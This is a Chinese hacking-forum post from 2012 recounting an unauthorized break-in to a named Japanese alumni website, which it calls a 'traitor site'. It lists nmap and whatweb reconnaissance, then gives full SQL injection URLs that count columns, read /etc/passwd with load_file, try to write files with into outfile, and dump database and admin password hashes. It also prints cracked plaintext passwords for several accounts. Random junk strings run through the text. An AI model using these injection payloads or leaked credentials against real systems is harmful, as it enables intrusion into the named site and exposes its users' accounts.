中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
1 n- F( l2 M4 A: g% |" ~7 A9 {
& W- [0 ~" L! F+ ?( i9 N/ a" h
0x01. 检测
www.zuaa.jp
收集数据
. l' F c& ]4 t6 s- E6 S1 {
[attach]73[/attach]
. X( x- Q, M* c9 T
2 C4 P7 G; t% c$ j
whatweb
) a# M# y) C% Y. B% d
[attach]74[/attach]
- v" {2 j2 G" y) @0 Y
/ ]: f: a3 B! h2 q! y! D# `( S& e y
利用NMAP扫描
0 v7 E; |' r5 G' N' f, A
[attach]75[/attach]
/ j, u# G1 j6 n1 F2 _
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
5 M/ i$ {6 ~+ [/ \# X7 _
0x02.找注入点
5 `6 s, T1 ]& P1 U" [7 k0 y
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
6 C$ x( u/ U" V+ H- T2 E
[attach]76[/attach]
) E, O: A) w( i' A! g5 t
- M: l/ F& M& N) M
0x03.order by
, e E: ?8 r3 t6 b( v& k
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
* j; G! v4 y# {+ t8 m$ S
[attach]77[/attach]
: Z1 o( C7 X( `4 K; e- D1 o; E. J4 _
order by 28报错,order by 27正常
! w6 `4 j! { t6 N( G9 A( k9 c) O
4 h2 A* G4 |: T6 d8 e5 g
0x04. union手动查询
7 M, O: U- F( l' a
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
3 f- w! r& A9 t c6 }, W9 ^9 Y. F
添加到 27 时正常显示
4 [/ d. Y, n5 c
[attach]78[/attach]
6 u) Q& n. H. u+ a/ V+ C6 b: r
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
) j% ~' O/ s( s$ ?
/ m, C* }. D: f9 q' S
0x05. info:
% E% e) E* e/ X5 I8 f1 t
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
1 b* D* I" J w$ @* O
[attach]79[/attach]
$ T b, {' y& K& V9 V2 G4 l
user: root@localhost
/ d% U) X. A k" X2 v
database: openpne
) o( g9 L$ `6 s& q
version: 4.1.22
5 r% ~9 d) J, o1 b( e0 w" y+ w
os: portbld-freebsd5.4
; U, ^+ B. S V
5 ~6 n9 E! \1 Z; }7 t9 t, F
0x06. root用户
6 N) g8 h( S9 } D* K
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
( p: m4 ?$ i& Z$ D3 n" P; g5 K
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
4 K% F: B6 }0 B% `! L) W
[attach]80[/attach]
9 U5 i6 S9 n8 X9 `8 }
通过工具转换
2 F& @ y. b3 f/ [; m, U; }3 z
[attach]81[/attach]
& S8 i! f, g/ R. }6 ]- B2 N" w
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
% e% v/ W: l4 s. @1 l
. P* \' d/ Y- h# }2 c
0x07. 利用 into outfile
: h( T% [* T$ L8 D9 z
全部都失败
& Q; d& U# L& \0 a o
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
% _0 b; L7 d( W; t n% \
7 F( T3 Y' k2 ]6 X% H- s2 ^
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
2 a' a, U& G* M3 R
. o* e1 m. y" o- w" V6 ?) Y7 ~
页面显示“MDB2 Error:syntax error”
8 V P" i' ^) n7 B) U" y
* N! v$ c! u$ U+ S5 G
0x08. 利用 mysql 4.1
+ F. ?% \4 K0 T- W% i" [* I
猜常规表名,字段未果 工具 sqlmap
1 V6 O) e: `% E7 X$ }
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
+ I9 x0 I# }* D' v, G2 s; S9 R
3 t2 I1 x- j7 p4 M+ l, ~3 u
[attach]82[/attach]
: y) z2 I/ k% s$ F O6 e c
0 R2 b% x" w) I4 z$ W7 m
0x09. 查找后台
: M. y/ H' e! J5 L7 c8 K+ o
利用 现有的各种 后台工具尝试都不行
6 z+ a& `. h3 u
$ b5 }. X L7 Y! b
0x10. MySL外联方法
" F; ]: g1 L. U& l
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
9 o$ u( K( v7 P1 K) g$ _2 {. M
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
: g) @6 ^; a" d }8 Z w b& a
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
3 X7 C) j. N- k2 G: b7 c J) ~) C
[attach]83[/attach]
$ t0 [3 b5 H8 s5 B4 @
这个可以在
www.cmd5.com
解密
' [8 k0 A! _4 N8 m! M3 q5 P3 a% F
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
* R& j# G& z6 G2 ?7 w1 G4 l* z
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
8 i, j/ J9 g, H# A5 `! Z1 Q
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
2 f8 C0 A! o! A: o
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
- g; D" I5 R: J" g
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
7 _/ L" m- ^% |
[attach]84[/attach]
; e( N+ a9 X9 T7 \& p
4 _$ E# c) r1 v9 T' Q
0x11. 网站突破
# F3 N1 @. A4 `" L+ K3 ]
发现网站的源程序 openpne, google 下载 openpne 源码
/ e6 ^- F9 ]& j+ X
[attach]85[/attach]
/ B3 M4 f) v8 n, a8 c
3 c! `8 q l0 h- d0 \) w
0x12. 默认信息利用
+ N w, W a+ H4 ?5 i6 P& \: ^
http://sns.zuaa.jp/?m=admin&a=page_login
7 c$ ^9 f& |% e2 [5 |2 J3 }
[attach]86[/attach]
$ m, B7 u6 B1 P( @8 p$ w( ^. d
表名 (c_admin_user) ,字段名(username,password)
/ M7 W6 L# K$ G0 K
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
8 @! ]! Z) V B" S& |$ O- r5 l
[attach]87[/attach]
3 u; L2 A& U! U' n& Y
解密
) Q8 e; I; W4 P9 l- g8 |
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
1 P, ^& p( u7 R7 R# D
zuaajp:c0923ec5857796a393da99905008c176, zju1897
n* R* Y9 S- K+ C/ D. @
* E2 q% U1 d+ U, Z% Z% t0 D
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
: D; c1 w# J) h7 m/ c
2 M. s% [8 D" {% M
0x13. 登录后台
5 r9 Z" A. h4 N6 W' x* Z6 c, `: L$ f* U, `
[attach]88[/attach]
5 |: s N9 j# j7 A: O5 [# o( a% A' _% d
, @& w3 o# G4 c4 B( R& h4 z3 _
$ n, x5 ]0 s* Z. Z. y
0x14. 小结
9 V) A. y; C+ r9 j! F9 W. @( j1 S
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
5 ]8 b! D/ t6 H
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
' o1 ?3 n' U( o: E% }- j
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
. I) F5 r' X$ |% N7 o( \! K- U% v
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
% ~: X: [( ]$ H: r8 D4 \
' I4 F+ J8 \7 J, G; n
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
J2 a& _8 B6 b: _, ]8 q& @
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2